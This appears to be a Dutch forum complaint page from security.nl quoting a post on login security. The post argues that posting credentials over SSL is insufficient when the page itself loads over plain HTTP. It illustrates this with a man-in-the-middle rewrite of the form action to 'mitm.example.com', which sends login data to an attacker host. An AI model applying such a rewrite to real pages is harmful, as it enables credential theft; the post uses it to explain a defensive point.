Je hebt een klacht over de onderstaande posting:
Door SirDice: De login gegevens worden over SSL gepost. <form action="https://secure.security.nl/" method="post"> Daar heb je geen fluit aan als een MITM aanvaller die regel code tussen www.security.nl en jouw webbrowser (ongemerkt voor jou) wijzigt in <form action="https://mitm.example.com/" method="post"> of <form action="http://mitm.example.com/" method="post"> Daarom is het essentieel dat je reeds een https verbinding hebt -met de juiste site- voordat een actie tot gevolg heeft dat gevoelige gegevens worden overgedragen. Overigens is dit onderwerp al verschillende keren aan de orde geweest, zie bijv. https://secure.security.nl/artikel/39384/1/Security.nl_https_verbetering.html.
Beschrijf je klacht (Optioneel):